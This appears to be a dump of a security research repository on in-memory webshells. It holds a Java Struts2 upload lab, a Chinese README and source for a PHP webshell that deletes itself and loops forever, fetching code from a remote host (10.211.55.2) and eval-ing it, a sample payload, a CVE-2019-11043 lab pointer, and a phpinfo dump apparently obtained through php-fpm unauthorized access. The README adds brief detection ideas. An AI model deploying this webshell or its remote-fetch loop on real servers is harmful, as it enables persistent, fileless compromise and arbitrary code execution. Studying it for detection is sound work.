https://raw.githubusercontent.com/jweny/MemShellDemo/3ed66da4eb6d24f406b9e1641a4ee12ac617f590/MemShellForJava/漏洞环境/upload-demo/WEB-INF/lib/xwork-core-2.3.20.jar


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/WEB-INF/web.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd"
 5 |          version="3.1">
 6 | 
 7 |         <filter>
 8 |                 <filter-name>struts2</filter-name>
 9 |                 <filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class>
10 |         </filter>
11 |         <filter-mapping>
12 |             <filter-name>struts2</filter-name>
13 |             <url-pattern>/*</url-pattern>
14 |         </filter-mapping>
15 | </web-app>


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/filemore.jsp:
--------------------------------------------------------------------------------
 1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
 2 | <%@ taglib prefix="s" uri="/struts-tags" %>
 3 | <html>
 4 | <head>
 5 |     <title>上传多张图片</title>
 6 | </head>
 7 | <body>
 8 | <s:actionerror/>
 9 | <s:form action="uploadMore.action" enctype="multipart/form-data">
10 |     <s:textfield name="userName"  label="用户名:"/>
11 |     <s:file name="file1" label="选择图片:"></s:file>
12 |     <s:file name="file2" label="选择图片:"></s:file>
13 |     <s:submit value="提交" />
14 | </s:form>
15 | </body>
16 | </html>
17 | 


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/index.jsp:
--------------------------------------------------------------------------------
 1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
 2 | <%@ taglib prefix="s" uri="/struts-tags" %>
 3 | <html>
 4 |   <head>
 5 |     <title>上传图片</title>
 6 |   </head>
 7 |   <body>
 8 |     <s:actionerror/>
 9 |   <s:form action="upload.action" enctype="multipart/form-data">
10 |     <s:textfield name="userName"  label="用户名"/>
11 |     <s:file name="file" label="选择图片"></s:file>
12 |     <s:submit value="提交" />
13 |   </s:form>
14 |   </body>
15 | </html>
16 | 


--------------------------------------------------------------------------------
/MemShellForJava/漏洞环境/upload-demo/success.jsp:
--------------------------------------------------------------------------------
 1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
 2 | <html>
 3 |   <head>
 4 |     <title>上传成功界面</title>
 5 |   </head>
 6 |   <body>
 7 |   成功
 8 |   </body>
 9 | </html>
10 | 


--------------------------------------------------------------------------------
/MemShellForPHP/内存驻留webshell/README.md:
--------------------------------------------------------------------------------
 1 | # 内存驻留webshell
 2 | 
 3 | ## 一、攻击原理
 4 | 
 5 | php webshell文件执行后删除自身。此webshell在执行后会自身删除，驻留内存之中，无文件残留。其原理主要利用以下方法：
 6 | 
 7 |     ignore_user_abort(true); // 后台运行
 8 | 
 9 | 这个函数的作用是指示服务器端在远程客户端关闭连接后是否继续执行下面的脚本。如设置为True，则表示如果用户停止脚本运行，仍然不影响脚本的运行
10 | 
11 |     set_time_limit(0); // 取消脚本运行时间的超时上限
12 | 
13 | 括号里边的数字是执行时间，如果为零说明永久执行直到程序结束，如果为大于零的数字，则不管程序是否执行完成，到了设定的秒数，程序结束。
14 | 
15 | 脚本也有可能被内置的脚本计时器中断。默认的超时限制为30秒。
16 | 这个值可以通过设置 php.ini 的 max_execution_time 或 Apache .conf 设置中对应的“php_value max_execution_time”参数或者 set_time_limit() 函数来更改。
17 | 
18 | php删除自身时借助的函数为
19 | 
20 |     unlink($_SERVER['SCRIPT_FILENAME']);
21 | 
22 | unlink函数运行条件较为苛刻，该脚本要具备可执行权限、可修改文件权限时方能执行。
23 | 
24 | 简单的webshell脚本：
25 | 
26 | 
27 |     <?php
28 |         chmod($_SERVER['SCRIPT_FILENAME'], 0777);
29 |         unlink($_SERVER['SCRIPT_FILENAME']);
30 |         ignore_user_abort(true);
31 |         set_time_limit(0);
32 |         echo "success";
33 |         $remote_file = 'http://10.211.55.2/111/test.txt';
34 |         while($code = file_get_contents($remote_file)){
35 |         @eval($code);
36 |         echo "xunhuan";
37 |         sleep(5);
38 |         };
39 |     ?>
40 | 
41 | test.txt中的代码如下：
42 | 
43 |     file_put_contents('printTime.txt','jweny '.time());
44 | 
45 | webshell执行后，删除自身，并在该目录生成 printTime.txt，每五秒一次写入一次时间戳。
46 | 
47 | ## 二、检测方案
48 | 
49 | 通过获取php-fpm status：
50 | 
51 | 1. 检查所有php进程处理请求的持续时间
52 | 2. 检测执行文件是否在文件系统真实存在


--------------------------------------------------------------------------------
/MemShellForPHP/内存驻留webshell/memWebshell.php:
--------------------------------------------------------------------------------
 1 |     <?php
 2 |         chmod($_SERVER['SCRIPT_FILENAME'], 0777);
 3 |         unlink($_SERVER['SCRIPT_FILENAME']);
 4 |         ignore_user_abort(true);
 5 |         set_time_limit(0);
 6 |         echo "success";
 7 |         $remote_file = 'http://10.211.55.2/111/test.txt';
 8 |         while($code = file_get_contents($remote_file)){
 9 |         @eval($code);
10 |         echo "xunhuan";
11 |         sleep(5);
12 |         };
13 |     ?>


--------------------------------------------------------------------------------
/MemShellForPHP/内存驻留webshell/test.txt:
--------------------------------------------------------------------------------
1 | file_put_contents('2.txt','jweny '.time());


--------------------------------------------------------------------------------
/MemShellForPHP/漏洞环境/php内存马漏洞环境.md:
--------------------------------------------------------------------------------
1 | 可使用vulhub中的/php/CVE-2019-11043进行试验。
2 | 
3 | ```
4 | https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043
5 | ```
6 | 
7 | 


--------------------------------------------------------------------------------
/MemShellForPHP/通过php-fpm未授权访问漏洞攻击/1.txt:
--------------------------------------------------------------------------------
  1 | <?php phpinfo(); exit; ?>
  2 | Content-type: text/html; charset=UTF-8
  3 | 
  4 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
  5 | <html xmlns="http://www.w3.org/1999/xhtml"><head>
  6 | <style type="text/css">
  7 | body {background-color: #fff; color: #222; font-family: sans-serif;}
  8 | pre {margin: 0; font-family: monospace;}
  9 | a:link {color: #009; text-decoration: none; background-color: #fff;}
 10 | a:hover {text-decoration: underline;}
 11 | table {border-collapse: collapse; border: 0; width: 934px; box-shadow: 1px 2px 3px #ccc;}
 12 | .center {text-align: center;}
 13 | .center table {margin: 1em auto; text-align: left;}
 14 | .center th {text-align: center !important;}
 15 | td, th {border: 1px solid #666; font-size: 75%; vertical-align: baseline; padding: 4px 5px;}
 16 | h1 {font-size: 150%;}
 17 | h2 {font-size: 125%;}
 18 | .p {text-align: left;}
 19 | .e {background-color: #ccf; width: 300px; font-weight: bold;}
 20 | .h {background-color: #99c; font-weight: bold;}
 21 | .v {background-color: #ddd; max-width: 300px; overflow-x: auto; word-wrap: break-word;}
 22 | .v i {color: #999;}
 23 | img {float: right; border: 0;}
 24 | hr {width: 934px; background-color: #ccc; border: 0; height: 1px;}
 25 | </style>
 26 | <title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
 27 | <body><div class="center">
 28 | <table>
 29 | <tr class="h"><td>
 30 | <a href="http://www.php.net/"><img border="0" src="data:image/png;base64,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" alt="PHP logo" /></a><h1 class="p">PHP Version 7.2.33</h1>
 31 | </td></tr>
 32 | </table>
 33 | <table>
 34 | <tr><td class="e">System </td><td class="v">Linux VM-0-8-centos 3.10.0-862.el7.x86_64 #1 SMP Fri Apr 20 16:44:24 UTC 2018 x86_64 </td></tr>
 35 | <tr><td class="e">Build Date </td><td class="v">Aug 11 2020 15:38:14 </td></tr>
 36 | <tr><td class="e">Configure Command </td><td class="v"> &#039;./configure&#039;  &#039;--prefix=/www/server/php/72&#039; &#039;--with-config-file-path=/www/server/php/72/etc&#039; &#039;--enable-fpm&#039; &#039;--with-fpm-user=www&#039; &#039;--with-fpm-group=www&#039; &#039;--enable-mysqlnd&#039; &#039;--with-mysqli=mysqlnd&#039; &#039;--with-pdo-mysql=mysqlnd&#039; &#039;--with-iconv-dir&#039; &#039;--with-freetype-dir=/usr/local/freetype&#039; &#039;--with-jpeg-dir&#039; &#039;--with-png-dir&#039; &#039;--with-zlib&#039; &#039;--with-libxml-dir=/usr&#039; &#039;--enable-xml&#039; &#039;--disable-rpath&#039; &#039;--enable-bcmath&#039; &#039;--enable-shmop&#039; &#039;--enable-sysvsem&#039; &#039;--enable-inline-optimization&#039; &#039;--with-curl=/usr/local/curl&#039; &#039;--enable-mbregex&#039; &#039;--enable-mbstring&#039; &#039;--enable-intl&#039; &#039;--enable-ftp&#039; &#039;--with-gd&#039; &#039;--enable-gd-native-ttf&#039; &#039;--with-openssl=/usr/local/openssl&#039; &#039;--with-mhash&#039; &#039;--enable-pcntl&#039; &#039;--enable-sockets&#039; &#039;--with-xmlrpc&#039; &#039;--enable-zip&#039; &#039;--enable-soap&#039; &#039;--with-gettext&#039; &#039;--disable-fileinfo&#039; &#039;--enable-opcache&#039; </td></tr>
 37 | <tr><td class="e">Server API </td><td class="v">FPM/FastCGI </td></tr>
 38 | <tr><td class="e">Virtual Directory Support </td><td class="v">disabled </td></tr>
 39 | <tr><td class="e">Configuration File (php.ini) Path </td><td class="v">/www/server/php/72/etc </td></tr>
 40 | <tr><td class="e">Loaded Configuration File </td><td class="v">/www/server/php/72/etc/php.ini </td></tr>
 41 | <tr><td class="e">Scan this dir for additional .ini files </td><td class="v">(none) </td></tr>
 42 | <tr><td class="e">Additional .ini files parsed </td><td class="v">(none) </td></tr>
 43 | <tr><td class="e">PHP API </td><td class="v">20170718 </td></tr>
 44 | <tr><td class="e">PHP Extension </td><td class="v">20170718 </td></tr>
 45 | <tr><td class="e">Zend Extension </td><td class="v">320170718 </td></tr>
 46 | <tr><td class="e">Zend Extension Build </td><td class="v">API320170718,NTS </td></tr>
 47 | <tr><td class="e">PHP Extension Build </td><td class="v">API20170718,NTS </td></tr>
 48 | <tr><td class="e">Debug Build </td><td class="v">no </td></tr>
 49 | <tr><td class="e">Thread Safety </td><td class="v">disabled </td></tr>
 50 | <tr><td class="e">Zend Signal Handling </td><td class="v">enabled </td></tr>
 51 | <tr><td class="e">Zend Memory Manager </td><td class="v">enabled </td></tr>
 52 | <tr><td class="e">Zend Multibyte Support </td><td class="v">provided by mbstring </td></tr>
 53 | <tr><td class="e">IPv6 Support </td><td class="v">enabled </td></tr>
 54 | <tr><td class="e">DTrace Support </td><td class="v">disabled </td></tr>
 55 | <tr><td class="e">Registered PHP Streams</td><td class="v">https, ftps, compress.zlib, php, file, glob, data, http, ftp, phar, zip</td></tr>
 56 | <tr><td class="e">Registered Stream Socket Transports</td><td class="v">tcp, udp, unix, udg, ssl, sslv3, tls, tlsv1.0, tlsv1.1, tlsv1.2</td></tr>
 57 | <tr><td class="e">Registered Stream Filters</td><td class="v">zlib.*, convert.iconv.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dechunk</td></tr>
 58 | </table>
 59 | <table>
 60 | <tr class="v"><td>
 61 | <a href="http://www.zend.com/"><img border="0" src="data:image/png;base64,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